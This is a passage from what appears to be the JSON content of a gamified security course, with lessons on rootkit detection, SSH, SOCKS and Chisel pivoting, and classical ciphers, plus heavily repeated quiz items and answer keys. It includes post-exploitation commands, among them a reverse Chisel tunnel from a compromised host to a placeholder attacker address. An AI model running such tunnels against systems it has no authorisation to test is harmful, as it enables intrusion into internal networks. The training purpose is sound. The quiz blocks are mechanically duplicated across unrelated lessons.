cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"rootkits-overview","cat":"Post-Exploitation","title":"Rootkits Overview","diff":3,"xp":250,"intro":"Modify the kernel to hide your presence entirely.","sections":[{"type":"text","content":"Kernel rootkits hook system calls. User-mode rootkits hook API calls."},{"type":"code","lang":"bash","content":"chkrootkit\nrkhunter --check\n# Compare ps vs /proc/*/status for hidden processes"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Kernel vs user-mode rootkit?","opts":["Kernel modifies the OS kernel","User-mode is more powerful","Kernel only works on Linux","No difference"],"ans":0},{"type":"quiz","q":"Symmetric encryption uses...","opts":["Two different keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is an example of...","opts":["Symmetric encryption","Asymmetric encryption","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"socks-proxy-pivoting","cat":"Post-Exploitation","title":"SOCKS Proxy Pivoting","diff":2,"xp":150,"intro":"Route tools through a compromised host.","sections":[{"type":"text","content":"SOCKS proxy on compromised host lets you access internal networks."},{"type":"code","lang":"bash","content":"ssh -D 1080 -N user@pivot\nproxychains nmap -sT 172.16.0.0/24"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"SOCKS proxy allows?","opts":["Faster scanning","Routing traffic through compromised host","Encrypting all traffic","Bypassing AV"],"ans":1},{"type":"quiz","q":"A hash function is...","opts":["Reversible","One-way (irreversible)","Bidirectional","Symmetric"],"ans":1},{"type":"quiz","q":"Salt in password hashing prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary attacks"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"ssh-tunneling-postex","cat":"Post-Exploitation","title":"SSH Tunneling","diff":1,"xp":100,"intro":"Local forward, remote forward, dynamic SOCKS.","sections":[{"type":"text","content":"SSH -L brings remote port to you. -R exposes your port remotely. -D creates SOCKS proxy."},{"type":"code","lang":"bash","content":"ssh -L 3389:172.16.0.10:3389 user@pivot\nssh -D 1080 user@pivot"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"SSH -L does?","opts":["Lists connections","Local port forward","Enable logging","Limit bandwidth"],"ans":1},{"type":"quiz","q":"TLS replaced which older protocol?","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric encryption uses...","opts":["Two different keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"chisel-pivoting","cat":"Post-Exploitation","title":"Chisel Pivoting","diff":2,"xp":150,"intro":"TCP tunnels over HTTP when SSH is blocked.","sections":[{"type":"text","content":"Chisel creates tunnels over HTTP. Works when SSH is blocked but HTTP isn't."},{"type":"code","lang":"bash","content":"# Server (your machine)\nchisel server --reverse --port 8080\n# Client (compromised)\n./chisel client YOUR_IP:8080 R:socks"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Chisel transport?","opts":["Raw TCP","HTTP","DNS","ICMP"],"ans":1},{"type":"quiz","q":"RSA is an example of...","opts":["Symmetric encryption","Asymmetric encryption","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"A hash function is...","opts":["Reversible","One-way (irreversible)","Bidirectional","Symmetric"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"caesar-cipher","cat":"Cryptography","title":"Caesar Cipher","diff":1,"xp":50,"intro":"Shift each letter by a fixed amount. 25 possible keys.","sections":[{"type":"text","content":"Caesar shifts letters. ROT13 is shift=13. Brute force is instant."},{"type":"code","lang":"python","content":"ct = 'KHOOR ZRUOG'\nfor s in range(26):\n    print(''.join(chr((ord(c)-65-s)%26+65) if c.isalpha() else c for c in ct))"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"How many Caesar cipher keys?","opts":["26","25","52","256"],"ans":1},{"type":"quiz","q":"Salt in password hashing prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary attacks"],"ans":1},{"type":"quiz","q":"TLS replaced which older protocol?","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"substitution-cipher","cat":"Cryptography","title":"Substitution Cipher","diff":1,"xp":50,"intro":"Each letter maps to another. Frequency analysis breaks it.","sections":[{"type":"text","content":"26! possible keys, but letter frequency in English makes it crackable."},{"type":"code","lang":"python","content":"from collections import Counter\nfreq = Counter(c for c in ciphertext if c.isalpha())\nprint(freq.most_common(5))"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"What breaks substitution ciphers?","opts":["Brute force","Frequency analysis","Quantum computers","Buffer overflow"],"ans":1},{"type":"quiz","q":"Symmetric encryption uses...","opts":["Two different keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is an example of...","opts":["Symmetric encryption","Asymmetric encryption","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"vigenere-cipher","cat":"Cryptography","title":"Vigenere Cipher","diff":1,"xp":75,"intro":"Polyalphabetic cipher with a keyword.","sections":[{"type":"text","content":"Different Caesar shifts based on repeating keyword. Find key length first."},{"type":"code","lang":"python","content":"def vigenere_decrypt(ct, key):\n    return ''.join(chr((ord(c)-65-ord(key[i%len(key)])+65)%26+65) if c.isalpha() else c for i,c in enumerate(ct))"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"What makes Vigenere harder than Caesar?","opts":["Uses numbers","Multiple shifts via keyword","Symmetric","Uses substitution"],"ans":1},{"type":"quiz","q":"A hash function is...","opts":["Reversible","One-way (irreversible)","Bidirectional","Symmetric"],"ans":1},{"type":"quiz","q":"Salt in password hashing prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary attacks"],"ans":1},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"xor-encryption","cat":"Cryptography","title":"XOR Encryption","diff":1,"xp":75,"intro":"Reversible, fast, used in malware. Single-byte XOR is trivial.","sections":[{"type":"text","content":"XOR: ciphertext = plaintext ^ key. Single-byte = 256 possibilities = brute force."},{"type":"code","lang":"python","content":"for key in range(256):\n    plaintext = bytes([b ^ key for b in ciphertext])\n    if all(32 <= b < 127 for b in plaintext): print(plaintext)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. 